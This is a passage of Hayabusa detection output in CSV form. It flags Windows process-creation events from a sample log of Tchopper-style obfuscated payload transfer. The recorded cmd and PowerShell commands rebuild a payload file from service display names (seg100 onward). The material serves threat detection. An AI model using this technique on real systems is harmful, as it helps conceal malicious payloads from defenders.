0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:55.301 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:55.317 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:56.773 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:56.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:02.569 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:02.585 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:17.309 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:20.265 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:20.281 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:24.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:24.615 